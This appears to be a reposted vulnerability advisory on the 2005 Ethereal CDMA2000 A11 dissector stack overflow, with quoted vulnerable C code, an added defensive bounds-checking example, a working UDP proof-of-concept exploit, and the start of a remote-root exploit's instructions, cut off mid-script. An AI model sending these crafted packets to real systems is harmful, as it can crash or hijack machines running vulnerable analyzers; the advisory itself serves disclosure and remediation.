2008-04-09 04:24:52  Source: Internet

Ethereal CDMA2000 A11 Packet Processing Module Remote Buffer Overflow Vulnerability

Published: 2005-03-09
Updated: 2005-03-09

Affected systems:
Ethereal Group Ethereal 0.10.9
Ethereal Group Ethereal 0.10.8
Ethereal Group Ethereal 0.10.7
Ethereal Group Ethereal 0.10.6
Ethereal Group Ethereal 0.10.5
Ethereal Group Ethereal 0.10.4
Ethereal Group Ethereal 0.10.3
Ethereal Group Ethereal 0.10.2
Ethereal Group Ethereal 0.10.1
Ethereal Group Ethereal 0.10
Description:
Ethereal is a network protocol analyzer used by many network professionals; it can be used to analyze the operating state of a network and supports almost every protocol.

A remote buffer overflow vulnerability exists in Ethereal's CDMA2000 A11 packet processing module. The flaw is in the dissect_a11_radius() function of packet-3g-a11.c, which is used by the RADIUS authentication module. The number of bytes copied from the packet into a stack buffer is taken from the packet itself. The buffer reserves 16 bytes, but the string length can be up to 256 bytes (unsigned char), so an attacker can overflow local variables and the return address.

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
size_t radius_len;
...
guchar str_val[MAX_STRVAL];
...
radius_len = tvb_get_guint8(tvb, offset + 1);
...
strncpy(str_val, tvb_get_ptr(tvb, offset + 2, radius_len - 2), radius_len - 2);
...
}
----------------

A similar flaw is found a few lines further down in the same function, where RADIUS attributes are copied onto the stack.

packet-3g-a11.c:
----------------
#define MAX_STRVAL 16
...
dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
{
...
guint attribute_len;
...
guchar str_val[MAX_STRVAL];
...
attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
...
case ATTR_TYPE_STR:
strncpy(str_val, tvb_get_ptr(tvb, offset + radius_offset + 2, attribute_len - 2),
attribute_len - 2);

...
}
----------------
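Both snippets share the same root cause: a one-byte length field read from the packet is used, minus two, as the copy count into a 16-byte stack array, with no comparison against either the destination size or the packet bounds. As an added illustration, not code from the advisory or from Ethereal, the following C block shows the validation that such a copy needs. The function names a11_copy_str_val() and check_attr_len() are hypothetical, and the packet bytes are constructed rather than captured traffic.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

/* Same destination size as the advisory's str_val[MAX_STRVAL]. */
#define MAX_STRVAL 16

enum { A11_OK = 0, A11_BAD_LEN = -1 };

/*
 * Hardened counterpart of the strncpy() calls quoted above (hypothetical name).
 * The copy count (radius_len - 2 / attribute_len - 2) comes from a length byte
 * inside the packet, so it is attacker-controlled and ranges 0..255. Three
 * checks are needed before a single byte is copied:
 *   1. the length must be at least 2, otherwise "len - 2" wraps to a huge
 *      unsigned value (radius_len is size_t, attribute_len is guint above);
 *   2. the attribute value must lie entirely inside the captured packet;
 *   3. the value must fit in str_val[] together with its terminating NUL.
 * Returns A11_OK and the copied length, or A11_BAD_LEN with str_val untouched.
 */
int a11_copy_str_val(const uint8_t *pkt, size_t pkt_len, size_t offset,
                     char str_val[MAX_STRVAL], size_t *out_len)
{
    if (offset + 2 > pkt_len)              /* need the type and length bytes */
        return A11_BAD_LEN;
    size_t attr_len = pkt[offset + 1];     /* the byte the dissector trusted */
    if (attr_len < 2)                      /* check 1: prevent unsigned wrap */
        return A11_BAD_LEN;
    size_t val_len = attr_len - 2;
    if (val_len > pkt_len - (offset + 2))  /* check 2: stay inside the packet */
        return A11_BAD_LEN;
    if (val_len >= MAX_STRVAL)             /* check 3: leave room for the NUL */
        return A11_BAD_LEN;
    memcpy(str_val, pkt + offset + 2, val_len);
    str_val[val_len] = '\0';
    if (out_len)
        *out_len = val_len;
    return A11_OK;
}

/*
 * Constructed harness (hypothetical name, not captured traffic): a 256-byte
 * attribute area filled with 'B', type byte 31 and the given length byte,
 * mirroring the buf[30]/buf[31] pair in the PoC further down the page.
 * Returns the number of bytes copied, or -1 when the attribute was rejected.
 */
long check_attr_len(uint8_t len_byte)
{
    uint8_t pkt[256];
    char str_val[MAX_STRVAL];
    size_t n = 0;

    memset(pkt, 'B', sizeof pkt);
    pkt[0] = 31;        /* attribute type */
    pkt[1] = len_byte;  /* attribute length byte, the attacker-controlled value */
    if (a11_copy_str_val(pkt, sizeof pkt, 0, str_val, &n) != A11_OK)
        return -1;
    return (long)n;
}

int main(void)
{
    const uint8_t lens[] = { 0, 1, 7, 17, 18, 150, 255 };
    for (size_t i = 0; i < sizeof lens; i++) {
        long r = check_attr_len(lens[i]);
        if (r < 0)
            printf("len byte %3u: rejected\n", (unsigned)lens[i]);
        else
            printf("len byte %3u: copied %ld bytes\n", (unsigned)lens[i], r);
    }
    return 0;
}
```

A length byte of 17 is the largest value accepted (15 payload bytes plus the NUL), while 18 and above, including the PoC's 150, are rejected before any copy takes place; values below 2, which would wrap the subtraction in the original code, are rejected as well.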

<* Source: LSS Security (exposed@lss.hr)
Leon Juranic (ljuranic@LSS.hr)

Links: http://marc.theaimsgroup.com/?l=bugtraq&m=111032119424935&w=2
http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-03-04
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

["eth0day.c" (text/plain)]

/*
*
* Ethereal 3G-A11 remote buffer overflow PoC exploit
* --------------------------------------------------
* Coded by Leon Juranic <ljuranic@lss.hr>
* LSS Security <http://security.lss.hr/en/>
*
*/

#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>


int main (int argc, char **argv)
{
int sock;
struct sockaddr_in sin;
unsigned char buf[1024];
char bla[200];

sock=socket(AF_INET,SOCK_DGRAM,0);

memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_port = htons(699);   /* CDMA2000 A11 port, so the capture is decoded by packet-3g-a11.c */

buf[0] = 22;
memset(buf + 1,'A',19);
buf[20] = 38;
*(unsigned short*)&buf[22] = htons(100);
*(unsigned short*)&buf[28] = 0x0101;
buf[30] = 31;
buf[31] = 150; // len for overflow...play with this value if it doesn't work

memset (bla,'B',200);
strncpy (buf + 32,bla,180);

sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
return 0;
}

/*
* Ethereal 0.10.9 and below proof-of-concept remote root exploit
* (c) 2005 Diego Giagio <dgiagio irion com br>
*
* The CDMA2000 A11 protocol dissector (packet-3g-a11.c) has a stack overflow
* vulnerability when decoding Airlink records. This vulnerability was also
* discovered by Diego Giagio on 01/March/2005. The vendor was imediatelly
* contacted.
*
*
* Notes:
*
* This program has only been tested on Linux.
*
* If your system isn't on the target list and you are running Linux (x86), you
* can easily find your system's ret address. See below:
*
* First you need to force Ethereal dump a core file.
* bash$ ./ethereal-g3-a11 -a 0xdeadbeef -s 1 -d <your_machine_ip> -p 65535
*
* Then, use the script below to find the ret address from the core file:
* --snip--
* #!/bin/sh
*
* ADDR=`objdump -D -s core | * grep "90909090 90909090 90909090 90909090" | * head
